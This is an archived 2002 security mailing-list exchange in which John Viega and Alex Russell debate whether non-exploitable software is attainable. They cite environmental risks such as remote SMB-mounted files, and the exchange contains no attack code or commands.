Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email email@example.com
From: John Viega (viega_at_list.org)
Date: Fri Dec 27 2002 - 14:57:50 CST
Oh, come on. Let's not argue about stupid semantic issues when we're
all on the same page. It's quite clear that one *can* build a piece of
software that is not in and of itself exploitable through a flaw in the
software. By that, I mean "you can't leverage remote resources for
your own gain", which is what most people are talking about when they
ask the question in the first place.
Saying the system that software's a part of still has risks such as DoS
or physical attacks is true and obvious, but is not really germane to
me given the question, because an issue with the software application
itself. For example, there aren't many techniques at the application
level that are effective at countering DoS measures, etc.
I'm not furthering any sort of myth; I was pointing out the reality of
the situation is worse than people think. If you read Jeremy Epstein's
comments as well, you'll see that environmental concerns with regard to
the software (e.g., Operating System and dependent libraries) make
things even harder.
On Friday, December 27, 2002, at 04:54 PM, Alex Russell wrote:
> On Friday 27 December 2002 11:43, John Viega wrote:
>> Of course it's possible to write something that's not exploitable.
>> However, it's tougher than most people think.
> As an unqualified statement, this is patently false. If you had said
> given a fixed environment, it's possible to develop an application that
> provides protection from circumvention of well defined security
> restrictions against a certain type of attack or attacker, then I might
> take it seriously. Until then, you're just furthering the myth of
> attainable total security (e.g., is survivability in thermonuclear war
> requirement of your app? is that appropriate? if your app fails in this
> case, has it been "exploited" or DoS'd or is that an accepted failure
>> For example, I've seen
>> applications that the authors assumed were not networked whatsoever,
>> and had no special local privilege. However, if the files they read
>> and wrote were stored on a remote file system such as an SMB mount,
>> then their otherwise non-networked program was completely exploitable.
> Secure design can often compartmentalize enough to handle a changing
> environment, but it's something of a desireable side effect of good
> not a strong property. Change the environment enough (or change
> abstractions that authors don't question, like the remote filesystem)
> , and
> anything will break. How it breaks is the important question, and
> I don't think we spend enough time discussing over the incessant din of
> those looking for a security silver bullet.
> Alex Russell